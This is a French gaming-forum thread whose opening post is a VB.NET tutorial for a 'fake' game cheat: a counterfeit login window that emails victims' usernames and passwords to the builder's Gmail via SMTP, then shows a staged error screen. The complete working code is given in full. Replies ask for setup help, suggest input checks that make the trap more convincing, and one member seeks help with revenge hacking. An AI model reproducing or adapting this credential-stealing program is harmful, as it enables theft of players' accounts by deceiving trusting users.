Créer un Fake.

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

May 1, 2010
524
0
581
Salut tout le monde je vais vous montrez comment créer un fake pour n'importe quel jeux, bon ca sera plus un piege a noob.

Je ne vais pas vous assistez pour le design' faites le comme vous voulez sachant que plus votre design' mieux ca sera.
Enfaite je vais vous donnez la base du design'.
Pour cela vous aurez besoin de:

2Form:
-1er form:
3 label
2 textbox
1 button
1 progressbar
1 timer

-2éme form:
2 textbox
3 label
1button
1 progressbar
3 checkedbutton
1 timer

La premiere form sera la plus importante celle qui va envoyer les informations sur votre gmail.
La 2éme ne sert pas a grand chose juste a faire croire que ce n'est pas un fake.

Commencez par placer vos 2 label et mettez comme texte: Login et Password
Ensuite mettez 2 textbox en dessus de chacun de ces label.
Et 1 button avec comme texte ce que vous voulez moi j'ai mis Connexion.
Ensuite si vous voulez appuyer le design' mettez 1 progressbar ou vous voulez et un petit label avec comme texte "en attente ..." ou ce que vous voulez.
Et ajouter le timer

Passons au code de cette form1:
Importez ceci:
Code:
Imports System.Net.Mail
Double clic sur votre button1 et ajouter ceci:
Code:
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

        Label3.Text = "Connexion ..." 'Change le texte de votre label "en attente..." en "connexion ..."
        Timer1.Start() 'Démarre votre timer1

    End Sub

Maintenant clic sur votre timer1 et ajoutez ceci:
Code:
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick

        ProgressBar1.Value = (ProgressBar1.Value + 10) 

        If ProgressBar1.value = 100 Then
            Dim mail As New MailMessage
            mail.To.Add("votre adresse gmail")
            mail.From = New MailAddress("votre adresse gmail")
            mail.Subject = "Fake"
            mail.Body = "Login: " & TextBox1.Text & "  Password: " & TextBox2.Text
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential(("votre adresse gmail"), "votre mot de passe gmail")
            SMTP.Send(mail)

            Label3.Text = "Connected."
            Form2.Show()

            Timer1.Stop()
        End If

    End Sub

Imports System.Net.Mail

Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Label3.Text = "Connexion ..." 'Change le texte de votre label "en attente..." en "connexion ..."
Timer1.Start() 'Démarre votre timer1

End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick

ProgressBar1.Value = (ProgressBar1.Value + 10)

If ProgressBar1.value = 100 Then
Dim mail As New MailMessage
mail.To.Add("votre adresse gmail")
mail.From = New MailAddress("votre adresse gmail")
mail.Subject = "Fake"
mail.Body = "Login: " & TextBox1.Text & " Password: " & TextBox2.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential(("votre adresse gmail"), "votre mot de passe gmail")
SMTP.Send(mail)

Label3.Text = "Connected."
Form2.Show()

Timer1.Stop()
End If

End Sub

End class

Ce code va faire avancer la progressbar1 a 100 puis va envoyer un mail avec les informations mis dans textbox1 et textbox2 et va ensuite ouvrir la 2eme form.

Passons donc a la 2eme form:
Placer les differents element comme vous voulez sachant que vous pouvez mettre: "Nom du personnage" dans label1 et "Valeur de money a ajouter" dans la label2 enfin comme vous voulez... (laissez le label3 comme dans l'autre form "en attente...")
placer vos textbox en dessous de ces labels puis ajouter 3checked textbox pour rendre votre form moins vide.

Par exemple moi c'est un fake dofus j'ai mis: "Now","Bank" et "Indetectable" ca ne veut rien dire mais on s'en fou ca change rien.
Ensuite ajouter votre button et votre progressbar ou vous voulez.

Bon passons au code de la form2:
Double clic sur votre button1 et mettez ce code:
Code:
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Timer1.Start()
    End Sub

Maintenant ajouter votre timer1, clic dessus et inserez ce code:
Code:
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        ProgressBar1.value = ProgressBar1.value + 5
        Label3.Text = "En cours ..."
        If ProgressBar1.value = 100 Then
            Timer1.Stop()
            Label3.Text = "Erreur ..."
            MsgBox("Une erreur c'est produite lors de l'injection, veuillez verifier votre login/password ou bien le nom de votre personnage.", 36, "Erreur") 'Mettez ce que vous voulez comme message d'erreur
            Close()
        End If
    End Sub

Code final:
Public Class Form2

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Timer1.Start()
End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
ProgressBar1.value = ProgressBar1.value + 5
Label3.Text = "En cours ..."
If ProgressBar1.value = 100 Then
Timer1.Stop()
Label3.Text = "Erreur ..."
MsgBox("Une erreur c'est produite lors de l'injection, veuillez verifier votre login/password ou bien le nom de votre personnage.", 36, "Erreur") 'Mettez ce que vous voulez comme message d'erreur
Close()
End If
End Sub
end class

Je ne vais pas passer plus de temps sur cette form puisqu'elle est inutile a vous de voir c'est du visuel pur.

Voila c'est fini l'important ce trouve dans la form1, l'envoie des informations pas mail.

Je suis desolé pour les fautes d'orthographe ainsi que le manque d'explication mais quelqu'un qui connais un peu le vb.net comprendra, j'ecris allongé c'est difficile.

Bonne chance.

Voila ce que ca pourrais donner un peu travaillé, sachant que ce n'est pas fini.

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
 

drappiro

Membre Banni
Feb 19, 2011
34
0
431
34
Salut , oui mais ou on met les codes ? ^^

---------- Message ajouté à 11h33 ---------- Le message précédent était à 10h35 ----------

Je cherche quelqu'un qui a skype et / ou teamviewver pour m'aider SVP urgent un mec m'avait hacké je veux me venger Svp =-(
 

drappiro

Membre Banni
Feb 19, 2011
34
0
431
34
Humm j'ai un petit probleme pour la progressbar je n'ai pas cliquer sur jouer et sa fait la barre verte un pe , un pe ... comment faire pour qu'elle vienne quand on clique sur jouer
 
Apr 26, 2011
1,315
2
944
26
In my home
Discord
brokeos
salut merci tres bon tuto mais tu devrais rajouter
If Textbox1.text = ""
Msg("Erreur, vous devez entrer un login")
ElseIf Textbox2.text = ""
Msg("Erreur, vous devez entrer un mdp")
Else
Timer1.Start
End If
 
May 1, 2010
524
0
581
Je supose que tu as juste copier coller, faut remplir les informations aux bons endroits et mettre les composantes neccessaires.

Bon après le nom de Fake est un prétexte pour vous montrez comment envoyer des mails ...

Et dites moi pas que sa marche pas il y a des rigolos qui envoie des dizaines de messages avec mon exemple.

+1 Cheater , pourquoi ferait-on un fake , le cheat sur cheat gam 3 est du partage

Pour se message qui date un peu, ma reponse est:

Ba justement je partage un code source !

ouia car en faite sa envoie pas email --"

Pour ce message qui date egalement:

C'est que tu t'y prend mal. Tu as le grade de programmeur pourtant ...

Et pour celui qui demande a quoi sa sert, lis le post.
 

Ririch

V
Aug 31, 2011
514
3
924
Ben en faites , ils ont juste fait copier/coller pour voir si TES codes sont bons (moi aussi en retard u_u)